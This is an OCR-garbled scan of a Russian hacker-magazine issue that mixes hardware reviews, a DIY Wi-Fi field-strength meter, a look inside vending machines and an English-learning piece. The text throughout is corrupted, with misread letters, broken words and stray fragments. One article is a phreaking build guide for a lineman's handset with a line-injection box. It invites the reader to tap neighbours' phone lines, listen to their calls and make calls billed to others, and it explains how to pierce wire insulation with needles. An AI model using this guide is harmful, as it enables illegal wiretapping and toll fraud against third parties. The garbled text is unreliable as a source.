Использование дополнителен ых антенн с вы- 
соким коэффициентом усиления и технологий 
Егате Вигзііпд и Егате Аддгедабоп позволяет 
добиться немного болееуверенного приема на 
дальних дистанциях и несколько большей скоро- 
сти, по сравнению со стандартными устройства- 
ми 802.1 1 д. Пиковые значения скорости ѴѴІ-Еі 
составляют29,31 , 23,89 и 19,23 Мбит/секдля 
удаленности 1 , 1 0 и 20 метров соответственно. 
ТепаЫе №55115 не выявил у роутера ни одной 
уязвимости, что говорит о его достаточно высо- 
кой защищенности. 



в локальную сеть провайдера (МАТ) и сравнитель- 
но хорошую производительность ѴѴІ-ЕІ. Радует 
и то, что работа РРТР полностью адаптирована 
под требования наших провайдеров. А учитывая 
невысокую стоимость, ЕеѵеІОпе ѴѴВР-5400 смело 
можно ставить в один ряд с такими фаворитами, 
как М5І Р054652 и А5ЕІ5 ѴѴЫ-500Ѳ Ргетіит. 
Пожалуй, единственное, чего ему на данный 
момент не хватает, — это поддержка протокола 
І6МР, который необходим для корректной работы 
мул ьти ка сто в о го тел евиденияі РТѴ. ИНИ 



ѴРЫ (РРТР) 
МАТ 



Пропускная способность 
ѴѴАЫ интерфейса 




□ Их 






> Пропускная способность ѴѴАІЧ-интерфейса: 
на графике представлена пропускная спо- 
собность в двух режимах: с использованием 
протокола РРТР и в режиме 5іа*іс ІР (МАТ 
Опіу) 




О 5 10 15 20 25 30 35 



> Скорость ѴѴі-Рі (тахраскеізііе): как видно, 
при увеличении расстояния с 1 до 10 метров, 
скорость падает не очень сильно, а вот на 
удалении 20 метров стабильность соедине- 
ния сильно снижается 



Скорость ѴѴі-Рі (тіпраскеізіге) 




0 ар-рс 

1 Ісіх 




□ Выводы 

Итак, подводя итог, можно смело сказать, что 
роутер ЕеѵеІОпе ѴѴВР-5400 достоин внимания. 

Он сочетает в себе достаточную для большинства 
пользователей пропускную способность РРТР-со- 
единения, высочайшую скорость маршрутизации 




О 0,2 0,4 0,6 0,8 1 1,2 

Мбит/с 

> Скорость ѴѴі-Рі (тіпраскеізііе): в этом 
случае измерения проводилисьс размером 
ІР-пакета в 64 байта 



Г ^ 

ІезЫаЬ выражает благодарность за предоставленное на тестирование оборудование российскому представительству компании ЕеѵеІОпе. 
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СЕРГЕИ ДОЛИН, 



/ РІ_тУЦ@ВЕАІ_.ХАКЕР.ВЦ / 




ТРУБКА МОНТАЖНИКА 



ФРИКЕРСКИЙ ДЕВАЙС ДЛЯ ПРОСЛУШИВАНИЯ СОСЕДСКИХ ТЕЛЕФОНОВ 



В этой статье я расскажу тебе о незаменимом для любого фрикера и одновременно 
очень простом устройстве. С этим девайсом фрикеру станут доступны все радости те- 
лефонных приколов: прослушивание разговоров соседей, звонки за чужой счет, под- 
мена голоса и так далее. Ты поймешь, что это за увлечение, прочувствуешь всю фри- 
керскую романтику и доставишь много незабываемых минут себе и своим друзьям. 



Б Необходимость 

Чтобы стать фрикером, надое чего-то 
начать. Конструкцию одного из моих первых 
фрик-девайсов я нашел в «Хакере». Он до 
сих пор где-то валяется. Мне всегда хотелось 
иметь карманныйтелефон, чтобы, видя 
любую «лапшу», я мог позвонить или 
послушать разговоры. Походив по разным 
радиомагазинам, я встретил такое 
устройство. Называется «трубка монтажника». 
Однако его стоимость оставляла желать, и ме- 
ня начала душить жаба. Тогда я принял 
решение сделать такое устройство сам, тем 
более что оно достаточно простое. Изначально 
я думал собрать телефон с нуля, из микросхем 
и прочих деталей. Но потом прикинул, что 
по затратам на детали и по трудозатратам 



выйдет дороже промышленного варианта, да 
и не факт, что заработает. Тут мой взор упал 
на обычный кнопочный телефон за 300 
рублей, и я сразууглядел в нем почти готовый 
фрик-девайс. 



О Исходники 

Я решил сделать не простую звонил ку, 
а с возможностью подсоединения к ли- 
нейному входу звуковухи, как на вход, так 
и на выход. Такая штука называется 
Носк Вох. Она позволяетзаписывать 
разговоры, например, надиктофон, или 
подавать в линию измененный голос со 
звуковой карточки. Для изготовления столь 
чудесного устройства нам понадобятся 
кнопочный телефон, корпус будущего 




фрик-девайса, маленький кусочек 
монтажки, провода, крокодильчики, иголки 
и конденсаторы 0,1 мкФ, резистор в 1 кОм 
(я брал 5Мй для большей миниатюрности) 
и 3 разъема под наушники (можно брать 
моно, так как стерео нам телефон пока не 
обеспечивает). Из инструментов нам нужны 
будут паяльник (желательно с насадками для 
резки пластика), отвертки, ножик-кусачки 
и термопистолет с термоклеем. 



Е Начало пути 

Начинаем наштрудс разборки исходного 
аппарата. Обнаруживаем саморезы, ко- 
торые придется выкрутить, или обыч- 
ные защелки, которые можно смело 
отломать, потому как корпус телефона 







і 







> Вклеиваем плату в корпус 



нам уже не понадобится и жалеть его 
нечего. После вскрытия необходимо оце- 
нить по размерам кишков, какой у тебя 
будет корпус для бокса. Учитывай, что 
в корпусе, кроме платы телефона, будут 
еще разъемы наушников, провода и Воск 
Вох. После выбора нужного корпуса, ко- 
торый можно взять, например, от старого 
модема или купить в магазине, перехо- 
дим к стадии переноса кишков телефона 
в более миниатюрный корпус и изготов- 
ления Воск Вох. 



□ Делаем Воск Вох 

Для начала определи, нужен ли тебе бокс 
в твоей фрикерской аптечке. Воск Вох 
позволяет гнать в телефонную линию сигнал 
с линейного выхода магнитофона, плеера 
или звуковухи, а также слушать этот 
сигнал. Это бесценная вещь для пранка; спе- 
циальный софт, подменяющий голос, — 
и в путь. Но зачастую это не нужно. Я же 
решил, что потрачу 1 5 минут и добавлю эту 
дополнительную функцию, даже если никогда 
не буду ее использовать. Будем считать, что 



и ты так решил, поэтомудвигаемся дальше. 
Запаиваем детали, как показано на 
схеме. Дальше можно сразу подключать ус- 
тройство к звуковой карте. Второй контакт 
бокса припаиваем к основной плате теле- 
фона на контакты прихода линии. Для вы- 
хода с телефонной линии я предусмотрел 
в корпусе «трубки» дополнительное 
гнездо, которое и подписал буковкой «В». 
Однако будь осторожен. Не берись за 
контакты Воск Вох, подключенного 
к линии, и корпуса компьютера. 



> Схема Воск Вох 
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> Разработ- 
кулюбого 
устройства, в том 
числе и фрик- 
девайсов, на- 
чинай с выбора 
корпуса. Иначе 
ты получишь бес- 
полезный набор 
плати проводов. 





> Крокодильчики для коннекта 



> Вырезаем панель под клаву 



> Если 

ты умный, у тебя 
прямые руки 
и ты жаждешь 
заниматься фри- 
кингом, то пиши 
мне. Возможно, 
сколотим интерес- 
ную команду. 






*Ф 









> Первым моим 
пособием 
по фрикингу, ко- 
торый наставил 
меня на путь 
истинный, была 
книга Петра Кара- 
бина «Эффектив- 
ный фрикинг». 

В целом книжка 
достаточна поп- 
совая, но в ней 
неплохо изло- 
жены основы 
фрикинга, спра- 
вочная информа- 
ция по различным 
боксам и прочая 
мелкая, но инте- 
ресная инфа. 
Книжка, конечно, 
немного устарела, 
но я до сих пор 
нахожу в ней 
что-то интересное 
для себя. 



У них весьма хорошая разница потенциалов, и лично 
меня достаточно неплохо дернуло током. 

□ Сборка 

Теперь начинается самый сложный и ответственный этап, 
на которыйу меняушло больше всего времени. Для на- 
чала в кишках исходного телефона нужно определить, ка- 
кие провода для чего используются. Узнаем, какая пара 
проводов, идущих к трубке, отвечаетза микрофон, а какая — 
за динамик. Для этого мы разбираем самутрубку. Если трубка 
не съемная, это можно сделать просто визуально, определив, 
какого цвета провода к чему подходят. Если же трубка 
съемная, то вооружаемся мультиметром и прозваниваем 
контакты на плате телефона и от самой трубки. После 
этого мы можем смело откусывать провода, идущие 
к трубке и в телефонную сеть. Если у проводов, иду- 
щих к линии, есть отдельный разъем, то удобнее его 
снять и вынуть провод. Затем надо убрать с прово- 
да основную изоляцию, а к паре проводов припаять 
крокодильчики. Нужно быть осторожнее с клавиатурой, так 
какона достаточно хлипко закреплена. Извлекаем отде- 
ленные кишки из корпуса телефона и переносим в заранее 
подготовленную коробку. Закрепляем основную плату 
телефона термоклеем. В корпусе делаем отверстия под 
разъемы для наушников, микрофона и Воск Вох. Их можно 
просверлить, но пластик при этом можеттреснуть. Поэтому 
я просто проделал их горячим паяльником. Подпаиваем нужные 



провода к разъемам (микрофон, Воск Вохи ухи) и устанавлива- 
ем разъемы на корпусе. Для того чтобы не путаться, какой 
разъем для чего, я их подписал паяльником: «Н» — 
наушники, «М» — микрофон, «В» — Воск Вох. 

Самый «вкусный» момент, который я оставил на де- 
серт, — это крепление клавиатуры. Можно, конечно, 
взять и под штатную клаву прорезать дырочку для каждой 
клавиши. Но я решил не заморачиваться и отрезал паяль- 
ником оттелефона пластину с дырками под кнопки. Затем 
в корпусе проделал паяльником отверстие под клавиатуру 
и приклеил сверху пластинку от исходного аппарата. Далее 
снизу подклеиваем плату клавиатуры, предваритель- 
ноустановив на нее резинку с клавишами. Последний 
штрих: прорезаем в корпусе отверстие для нажатия кнопки 
сброса. Любители могут, конечно, вывести ее отдельной 
пипкой на корпус, но мне было лень. Все, крутой фрик- 
девайс готов. Чтобы можно было легко подключиться 
к любому проводу, в крокодильчики я вставил обычные 
иголки. Ими просто протыкается изоляция провода 
и достигается жила. 

□ Вывод 

Воттак, имея прямые руки, голову на плечах и непреодо- 
лимое желание стать фрикером, ты можешь обзавестись 
неплохим девайсом для телефонного хака. Все, что тебе 
нужно, — это внимательно следовать инструкциям, приве- 
денным в статье. Удачи тебе, фрикер. □□ 



> Подписи к гнездам 







С] 



СТАЛ 



КОИ 



ЛОШАІ 



КУЧНО? 



РІауЗМіоп 2 
(ЗІіт) ршз 



5040 р. 



N60 Везісіепі: ЕѵіІ ХЬох 360 Ѵісіео 
4 Ытііесі ЕсШіоп бате Зузіет 

р^0[^ (РиІІу-ІоасІесІ) 



5600 р. 



14560 р. 



Играй 
просто! 



СатеРо$1 






© Тел.: (495) 780-8825 
Факс.: (495) 780-8824 

шшш.датеро$(.ги 



1120 р. 



біаЫо Асііоп Рідиге 

Иесготапсег 



Требуются курьеры! Достойные условия. Классный молодой коллектив. 
Звоните: +7 (495) 780 88 25 или пишите: заІез@даппероз1:.ги 



РЗР (ЕІІРЮ) бате Воу Місго ІМіпІепсІо 63 

ВАЗЕ (розовый) биаізсгееп 

7280 р. 3220 р. 4200 р. 



Огромный 
выбор компью- 
терных игр 



* Игры для всех 
телевизионных 
приставок 



* Коллекционные 
фигурки из игр 



СМЕНИТЬ ИГРУ? 










^ 1т?ггит 



СОЗДАЕМ ПРОСТЕЙШИЙ ИЗМЕРИТЕЛЬ 
НАПРЯЖЕННОСТИ ѴѴІ-РІ ПОЛЯ 



& Задумка 

Идея чрезвычайно простая: необходимо 
сделать антенну диапазона работы ѴѴІ-РІ сети, 
после чего измерятьзначения наводимой в ней 
ЭДС. Чтобы не изобретать велосипед, я вбил в 
Гугле «ѴѴІ-РІ напряженность поля» и перешел 
по первой ссылке на статью «Конструкция 
напряженности измерителя поля» [ ЬирУ/ѵЬт. 

Іа п23.ги/ѴѴІ-РіЛ5т.Ыт[ ). Лично меня приве- 
денная в ней схема привлекла своей простотой 
и дешевизной изготовления. Эта конструкция 
представляет собой обычный детекторный при- 
емник, где в качестве колебательного контура 
выступают квадрат из проволоки и подстроеч- 
ный конденсатор. Нагружается этот приемник 
на милливольтметр. Меня, конечно, смутили 
отсутствие дополнительного усиления сигнала 
итребование высокой, почти заводской, 
точности изготовления. Но интерес, простота 



и дешевизна прибора сделали 
своедело, и я решил попробо- 
ватьсварганитьего. 

Е Изготовление 

Для изготовления мне понадобились 
СВЧ-диод в керамическом корпусе Д603 или 
Д405, подстроечный конденсатор на 5-15 пФ 
и керамический конденсатор на 1 нФ. Детали 
оказалось не та к просто достать в обычных 
магазинах, но на наших радиорынках найдется 
все. После закупки всего необходимого встал 
вопрос, какже рациональнее разместить все 
это на мультиметре. Я решил пойти по пути 
наименьшего сопротивления иупростил 
предлагаемую в статье конструкцию, не меняя 
ее функциональности. Взяв обыкновенную 
советскую вилку и сняв с нее верхний кожух, я 
обточил все выступающие части на 



ОЗИМЕТР 



Для оценки качес- 
тва ѴѴі-Рі антенны 
нередко хочется 
иметь приборчик, 
который может 
показать в некото- 
рых относительных 
единицах мощность 
излучения 
передатчика. 

Над поиском про- 
мышленных образ- 
цов я не заморачи- 
вался, так как это 
недостойно настоя- 
щего гика. Поэтому 
было принято реше- 
ние спаять девайс 
своими руками. 
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> Вилка, текстолит и кондер 



«Прибор прост в из- 
готовлении и так же 
прост в использовании, 
однако точность его 
измерений оставляет 
желать лучшего» 



>Текстолит с бороздкой 



точиле. К штекерам под винт прикрутил 2толс- Ш 
тых провода. Сверху на эти две проволки я надел 
односторонний фольгированный текстолите 
просверленными в нем отверстиями на рассто- 
янии этих проволочек и запаял это все сверху. 
Получиласьдостаточно надежная конструкция, 
вставляющаяся в гнездо мультиметра. Между 
проволочками, под пластиной, я подпаял нано- 
фарадный конденсатор. 

0 Антенна 

Теперь надо подготовить место для антенны. 

Один конта кт запаянной проволоки нужно отде- 
лить от основного пласта меди, чтобы не было 
проводящего слоя. Там будет располагаться 
принимающая рамка. Далее изгибаем рамки для 
антенны. По чертежам, гнем из 1 -2 мм проволоки 
3 квадрата. Сторона первого составляетЗО мм, 
второго (выступающего в роли активного виб- 
ратора) — 33 мм, третьего (рефлектора) 

— 34,5 мм. На самом деле, такую точность изгиба 
можно получить только на заводе, поэтому я 
забил и все измерял просто обычной деревянной 
линейкой, делал засечки ножиком и изгибал 
пассатижами. Когда все квадраты будут готовы, и^ 
нужно запаять на плате. Чтобы тебе было проще 
это делать и чтобы ты знал 4 чт'о\уда подключать, 
арисовал 4хему.‘ Крайни'^ квЗйрѳ-ты просто 



наглухо^одп^иваемк^ластине (желательно все- 











17,2 

*= 


33. 2 

<5 





таки соблюдать расстояние, ноу меня получилась 
погрешность в миллиметр). Центральный квадрат 
подпаиваем к нашему проводу, отделенному от 
основной пластины одним контактом. На второй 
вешаем СВЧ-диод и между ножками квадрата 
подпаиваем конденсатор. Все, запаиваем диод 
на основную пластину и вставляем нашу громозд- 
кую конструкцию в мультиметр. Ставим прибор на 
измерение милливольти начинаем настраивать 
антенну. Для этого берем телефон с включенным 
блютусом, отвертку и начинаем ловить сигнал, 
подкручивая конденсатор и добиваясь макси- 
мального значения напряжения на приборе. Как 
■поймали — уносим тетгефон отантенны, проверяя 
затухай и^іТгналё. Ббли значениеуменышает- 
ся/, то значит, м^і поймали частоту 2,4 ГГц. Все, 
і с ч ита й\-ф$э ив гото в . 



О Выводы 

Прибор прост в изготовлении и также прост в 
использовании, однако точность его измере- 
ний оставляет желать лучшего. Но опреде- 
лить наличие сигнала и мощность его излу- 
чения можно. Например, с помощью прибора 
я установил, что мой мобильнике блютусом 
излучает сигнал гораздо слабее, чем ѴѴІ-РІ 
точка. Но для качественного устройства ему, 
конечно, ещедалеко. 

В дальнейшем предполагается сделать к 
антенне дополнительный усилитель, собрав 
дополнительную схему, более детально ^уа- № 
лизирс вать полученный сигнал, нАіри'м'ер, с . 
п омо шью микроконтроллера, точнее согнуть 
рамки и закрепить их, как предложено в г ’ 
оригинальной статье. ІИІ 
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СМС ЫоЫезве АѴС-К1 



СоТѴіеѵѵ РСІ ОУО 3 НѵЬгісІ 



Корпус для твоего мультимедиа-центра 



Гибридный тюнер для аналогового и цифрового ТВ/радио 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Торм-срактор: МісИІеАТХ 
Слоты: 2x5,25 ехі, 1x3,5 ехі, 5x3,5 іпі 
Порты: 4х 115В, РігеѴѴІге, тіс, аисііо 

Дополнительной вентилятора (120-мм), панельуправления, клавиши 
управления проигрывателем 
Размеры, мм: 200x5 1 0x440 
Вес,кг: 9,16 



1 . Это устройство от компании ѲМС — отличный гибрид серьезного 
корпуса для фанатовжелеза и вместилища компонентов для создания 
домашнего кинотеатра. 

2. Фанатам понравится то, что в этот корпус, благодаря его размерам, 
можно засунуть массу компонентов. Форм-фактор МісИІеАТХ и куча (пара 
5,25”, 1 внешнийи5 внутренних 3,5”) отсеков для накопителей обеспечат 
такую возможность. 

3. Внутри есть парочка дополнительных вентиляторов (120-мм) и рас- 
труб напротив процессора. 

4 . Но это внутри. Аснаружи, на передней панели, имеется масса ценных 
устройств. Во-первых, дополнительные порты (РігеѴѴІге, 115В и аудио). 
Во-вторых, контрольная панель сЖК-дисплеем и возможностью изме- 
нять скорость вентиляторов. 

5 . В-третьих, и это непосредственно касается мультимедийности, на той 
же передней панели находятся кнопки управления проигрывателем. 
Крометого, все понимают, что тянуться и нагибаться к ним тебе лень, 
поэтому в комплект поставки входити пультдистанционного управления. 

6. Завершая рассказ о передней панели, стоит сказать, что на ней есть 
еще и кардридер. 

7 . В комплект поставки входят все необходимые винтики, кабели и про- 
чая мелочь, необходимая для монтажа комплектующих в корпус. 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Интерфейс: РСІ 2.1 
Селектор: Хсіеѵе 3028 
Декодер/энкодер: СХ2341 8 

Поддержка стандартов вещания: РАІ_/5ЕСАМ/І\ІТ5С/0ѴВ-Т/РМ/УКВ 
Поддержка форматов звука: А2 , N I С АМ 

Поддержка кодирования видео:аппаратная — МРЕ6-2, программная 
— системные кодеки 
Пульт ДУ: есть 

Дополнительно: антенна ОѴВ-Т, низкопрофильная планка для установки 
в ЬагеЬопе, диске Іп1;егѴісІео ОѴО Сгеа1юг2 



1 . Низкопрофильная планка и отсутствие выступающих элементов дела- 
ют возможной установку девайса в ЬагеЬопе системы. 

2. Наличие аппаратного МРЕб-кодека позволяет снизить системные 
требования и на лету захватывать видео в хорошем качестве. 

3. С учетом внедрен ия телеком пан ия ми новых технологий точно приго- 
дится поддержка стереоформатов звукового вещания. 

4 . Основные стандарты телевещания дополнены возможностью прини- 
мать цифровой видео- и радиосигнал в формате ОѴВ-Т. 

5 . Имеющийся радиотюнер прилично при ни мает си гнал как в ЕМ -, так и 
вУКВ-диапазоне. 

6 . В качестве декодераѴэнкодера используется всего 1 чип СХ23418, 
который гораздо эффективнее связки в планетепловыделения и занима- 
емого на плате места. 

7 . В комплектацию включена короткая антенна для приема цифрового 
телевидения, котораятакже неплохо ловитаналоговые каналы. 

8. Вместе с эфирным цифровымтелевидением (ОѴВ-Т) можно организо- 
ватьассиметричный доступ в интернет, наподобие спутникового (ОѴВ-5). 




1 . Пока маловато теле- и радиостанций, вещающих в цифровом формате. 

1 . А вот БП внутри нет. Можешь, конечно, жалеть об этом, но лучше пойди Но их количество будетувеличиваться благодаря конкурентному превос- 

и купи тот Р5Ы, который нравится тебе, а не производителю. ходству в качестве звука/картинки и согласно планам правительства. 
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ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Интерфейс: РСІ Ехргезз 

Ядре: ІМѴЮІАбеРогсе 760005 

Количество пиксельных конвейеров, шт.: 1 2 

Шина памяти, вит: 1 28 

Овъем памяти, Мв: 256 

Частота ядра, МГ ц: 400 

Частота памяти, МГ ц: 700 ( 1 400) 

Тип памяти: 600Р-3 
Выходы: йѴІ, 0-5иЬ, 5-Ѵібео 



1 . Девайс относится к категории МісИІе-Епсі, то есть сочетает в себе 
адекватную производительность при умеренной цене. 

2. Оригинальная конструкция охлаждения выделяет плату среди 
конкурентов, сделанных по образу и подобию референсов ЫѴЮІА. 

3. В наличии полная поддержка ЗИабег МобеІЗ.О — перед новыми игра- 
ми комп в грязь лицом точно не ударит. 

4. В комплекте устройством компания Віозіаг кладетутилиту Ѵ-Рапдег 
— целый программный комплекс, упрощающий разгон. В ней даже име- 
ется возможность поднимать рабочие напряжения! 

5. Плата очень неплохо показывает себя в современных играхдаже на 
номинальных частотах, не тронутых разгоном. 

6. При наличии двухтаких платты без проблем сможешь объединить их 
в массив 5Ы — это повысит ЕР5 в тяжелых режимах. 



1. Е5ААи анизотропией лучше не увлекаться. По крайней мере, не в на- 
вороченных играх — ЕР5 может упасть слишком низко. 

2. Память кулером не охлаждается — с ее разгоном лучше быть 
аккуратнее. 

3. Любителям домашней режиссуры девайс не подойдет— чип ѴІѴО 
в нем не предусмотрен. 



РЕЗУЛЬТАТЫ ТЕСТИРОВАНИЯ 

ЗОМагк'05, Баллов: 4884 

ЗОМагк'Об, Баллов: 2442 

Гаг Сгу (1230x1024), РРЗ: 87,8 

Гаг Сгу (1280x1 024 АА4х/АР1 6х), РРЗ: 55,93 

ОоотЗ (1280x1024), РР5: 77,4 

ОооппЗ (1280x1 024 АА4х/АР1 6х), РРЗ: 42,6 

НаІГ-ИГе 2 і_об* Соаг* НОР ( 1 230х 1 024), РРЗ: 41,1 

НаІГ-ЫГе 2 і_об* Соаг* НОР ( 1 230х 1 024 АА4х/АР 1 6х), РРЗ: 29,9 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Тип устройства: графическая плата 

Графический процессор: ІЧІѴЮІАбеРогсе 710065 

Частота ГП, МГ ц: 350 

Частота памяти, МГ ц: 660 

Овьем памяти, Мб: 1 28 й й Р2 

Пиксельные конвейеры, шт.: 4 

Вершинные конвейеры, шт.: 3 

Шина памяти, вит: 64 

Интерфейс: РСІ-Ехргеззх 16 

Техпроцесс, нм: 90 



1 . Устройство построено на графическом чипе ІМѴЮІАбеРогсе 

71 0065, который характеризуется наличием четырех пиксельных и трех 
вершинных конвейеров. Работает процессор на штатных частотах — 

350 МГц. 

2. Главная фишка этой видеокарты — поддержка технологии 
ТигЬосасЬе, благодаря которой объем видеопамяти может достигать 

512 Мб. Проще говоря, карта заимствует часть у оперативной памяти, од- 
нако работатьтакая функция будеттолько при условии наличия 
1 Гб предустановленной ПЗУ. 

3. Кулер, прямо скажем, ничем экстраординарным 

не отличается. Это небольшой по высоте алюминиевый прямоугольный 
параллелепипед — банальная пассивная охлаждалка. богласно нашим 
данным, при нагрузках графический процессор греется оченьелабо 
— у настемпература не превысила 46 градусов по Цельсию. 

4. Видеокарта Раііі 71 0065 поддерживаеттехнологиюБЫ. Пользователь 
может увеличить производительность, установив две столь замечательные 
платы в конфигурацию дуального режима работы. Однако смысла в данной 
процедуре крайне мало — проще купить одну приличную видеокарту. 

5. Раііі 710065также полностью поддерживает Місгозо^ ОігесІіХ 9.0 
и шейдерную модельЗ.О. 



1 . Очень низкая производительность в современных играх. Придется 
жертвовать разрешением, эффектами и т.п., чтобы хоть как-то погамать. 



РЕЗУЛЬТАТЫ ТЕСТИРОВАНИЯ: 
30 Маг к 2006: 421 
30Магк2005: 872 
НаІГ-ИГе 2, 1024x763: 18 
Ооопп 3 (Міп. ОеО, 1 024x768: 1 1 



ТЕСТОВЫЙ СТЕНА 

Процессор: АМй АПоп 643500+. Материнская плата: АІЬаІгоп К85Ы. Кулер: біасіа ИесГі Ідіоо 7200 ЫдЫ. ОЗУ, Мб: 5 12, ОогзаігѴаІие 5еІесі Ѵ551 2МВ400 
Винчестер, Гб: 80, 5еада1е Ваггасиба 7200грт. Блок питания, Вт: 350, ІЧопате. 
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1е5І_ІаЬ выражаетблагодарностьза предоставленное натестирование оборудование компаниям ІЧеѵаба (т. (495) 101-2819. ѵѵѵѵѵѵ.пеѵаба.ги ). 

2Е (т. (495) 508-7252, уѵѵѵѵѵ.2[-рг.ги ). российскому представительству компании ОоТѴІеѵѵ, а также европейскому представительству компании Віозіаг. 
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внутренности 

ВЕНДИНГОВ ЫХ 

АППАРАТОВ 



7) Цистерна 
с водой на 50 л 



8) Мусорное 
ведро 



9) Банкнотоприемник 



і . ттппляют газировку и шоколадки, всегда будоражили 
Автоматы, которые варят кофе, лтр ' Д ' ивлекает на с: там чипы и микросхемы, 

ѵмы хакеров. Любая автоматизация при^екаетнас^ можно ^ ыло легк0 0 бма- 

там мы ищем баги и ошибки. Лет пять назад такие автом вытаскивая за вер евочку опу- 
„ывать, засовывм вместо реа^ныхбашшо^ ^ н 0 интерес к автоматам остался. 

вяяяяхяяяь-о пациента <<инсаида>> - 



10) Системная 
плата 



1 1) Монетоприемник 



12) Отсек 
выдачи сдачи 
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1)Хранилище 
стаканчиков. 
Влезает 1 000 
стаканов 



2) Емкость 
под сахар 



ит.д 



6) Емкости под 
ингридиенты 
'кофе, сливки 
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^Рвз 



Взгляд вовнутрь 

Невозможно в рамках одной статьи охватить устройство всех вендинговых автоматов, поэтому для примера я решил рассказать о кофе 





> Укладчик купюр с кучей кэша 



> Банкнотопрокатный механизм 
Купюроприемник 

Купюроприемник — это устройство, создан- 
ное специально для распознавания и приема 
бумажных денег. В последнее время произво- 
дители купюроприемников постоянно совер- 
шенствуютсвои продукты, добавляя разнооб- 
разные механизмы защиты. Все дело втом, 
что изначально эти девайсы были достаточно 
тупыми, и можно было подсовывать им даже не- 
качественные подделки, вытаскивать банкноты 
ит.д. Потеряв немало денег, производители 
стали делать оченьумныеустройства, которые, 
как правило, при распознавании банкноты про- 
веряютсразу множество параметров: размеры, 



оптические и магнитные свойства, состав 
краски ит.д. Короче, обмануть нормальный 
купюроприемниксейчас почти невозможно. 
Вернемся к нашему кофейному автомату. В нем 
установлен купюроприемник ІСТ А7, который 
сейчас можно без проблем купить в интернете 
за 1600 рублей с доставкой. Почитать специ- 
фикацию можно на сайте производителя: уууууу, 
іс1-ги55Іа.ги/раде4.Міт[ . Вкратце расскажу о 
свойствах этого девайса. 

Он оборудован хитрой защитой от вытаскива- 
ния купюры (антифишинг), умеет возвращать 
последнюю вставленную купюру при отказе от 
покупки. Конфигурирование всех параметров 



купюроприемника осуществляется при помо- 
щи восьми микропереключателей на корпусе 
девайса. Питается устройство 1 2 вольтами, а 
максимальное потребление составляет 50 Вт. 
Контейнер укладчика рассчитан на 400 банк- 
нот, а вероятность распознавания банкноты 
составляет 0,97. Допустимая ширина банкноты 
колеблется от 65 до 76 мм, используется ремен- 
ный механизм протяжки банкнот. 

Подлинность банкноты определяется на основе 
ее физических размеров, изображения, водя- 
ныхзнаков и магнитных свойств. 

Весь процесс приема банкноты занимаетоколо 
3 секунд. 



Как это работает? 

Послетого как оплачена стоимостьтовара, автомат начинает 

приготовление напитка. 

Из специальных контейнеров в смеситель забираются все 

необходимые ингридиенты (сахар, кофе, вода и т.д). Миксер 

смешивает все ингридиенты и наполняетзаранееустановлен 

ный стаканчик. Затем автомат сигнализирует о готовности, и мы 
забираем кофе. Но на этом его работа не окончена. После всех 

процессов происходит очистка миксера и трубок подачи кофе пу-^ 

тем промывки водой. Это делается, чтобы избежать божественной 
ситуации, при которой твой утренний кофе смешается с куриным 
бульономтоварища :). 




— г -■«лдсфіного автомата 

п^оТ э ::;; р т г 

в, "„“ГГ •«. ‘вой 
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Монетоприемник 

Монетоприемник — это специальное 
устройство для приема и распознова- 
ния монет. Существуетдве разновид- 
ности монетоприемников:те, которые 
выдают сдачу, и те, которые сдачу не вы- 
дают. В первом случае монетоприемник 
имеет небольшие габариты, дешево 
стоит и, вообще, работаеточень просто. 
Монета попадает в специальный отсек, 
где освещается светодиодами. Возвра- 
щаемый свет попадает на фотоэлемент, 
сигнал с которого — «фотографию» 




монеты — анализирует контроллер 
устройства. На флешке девайса зашиты 
некоторые эталонные сигнатуры для 
каждого из допустивыхтипов монет, 
с которыми и сравнивается образ 
монеты. 

В случае если автомату нужно выдать 
сдачу, первым делом рассчитывается, 
сколько и каких монет нужно выдать 
пользователю. После этого в ход идет 
хитрый механизм, который выбрасыва- 
ет клиенту нужные монеты, забирая их 
из специального лотка. 






> Системна плата снетч-автомата 



> Лотокс монетами в механизме выдачи сдачи 







1 ) Микропроцессор 



3) Питание платы 



2] Конденсаторы 



а 5) Видеопорт для 
подключения экрана 



6) Свободные порты 
для допополнитель- 
ныхустройств 



8) Порт подключения 
банкнотоприемника 



7) Флеш-память 
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>Снетч - автомат 



>Хранилищесложечками и стаканчиками 



> Емкости под ингридиенты (кофе, шоколад, какао, сливки) 



МйВ протокол 

КШВ (М и іи- й гор Виз) - это протокол для 
«общения» устройств внутри автомата. С его 
помощью осуществляется взаимодействие 
различныхузлов, при этом обычно не возникает 
проблем с совместимостью девайсов разных 


производителей, поскольку протокол описан 
сторонней конторой и все производители при- 
держиваются его спецификации. 

Главный контроллер автомата — ѴМС (ѵепбіпд 
гласЫпез сопігоііег) — является главным уст- 
ройством машины и посредством 


четко описанных в протоколе МОВ команд 
«общается» с другими устройствами. 
Главными приемуществами протокола МОВ 
являются возможность быстрого подключения 
устройств к автомату и обеспечение совмести- 
мости устройств от разных вендоров. 





Соленоид 

Вообще, соленоид — это катушка. В контексте вендинговых 
автоматов под «соленоидом» пони мают электромагнит- 
ный клапан, который служит для открытия доступа воды 
в нагревательный бак (бойлер). Практически все автоматы 
по продаже напитков оснащены соленоидами. 

Составные части соленоида: 

•электромеханический клапан с возвратной пружиной; 
•электромагнитная катушка; 

•корпус. 

При подаче электронного сигнала на электромагнитную 
катушку, притягивается электромеханический клапан и от- 
крывается отверстие в корпусе для прохода воды. Как толь- 
ко сигнал прекращается, пружина возвращает клапан на 
место и перекрывает подачу воды. 
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АНГЛИЙСКИЙ 



С ТУРБОНАДДУВОМ 



ХАКЕРСКИЙ ПОДХОД К ИЗУЧЕНИЮ ИНОСТРАННОГО ЯЗЫКА 

Как изучить английский за минимальное время и практически без усилий? Какие 



методики существуют и какие программы могут этому поспособствовать? Возможно 



ли за пару месяцев подтянуть свой уровень с полного нуля до свободного общения 
с американосами по мылу, аське и в чате? И если это реально (а это реально), 



то в каком направлении нужно идти? 
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ЗЕТ СОІОЯЯ ІИДТ ѴСЦТОЖТ ТО РЙОСЕ35. 
I * Им Мдотгі шгЛ *» ічііілм чиЫеИгі 

1?п іяііяш т-1 дочгшк №» <■_■_<& іп твЕнкСЕ-ЕСел 



\ЗШа діЯШт ОШВЦ і 

Г Р Р г 



>5иЬРірза работой 



> Выбор цвета текста поможет, если субтитры отобра- 
жаются с дополнительными эффектами 



■ то из нас не мечтаетвыучитьанглийский язык? 
Но далеко не у всех эта мечта воплощается 
в жизнь. Соблазнившись перспективами 
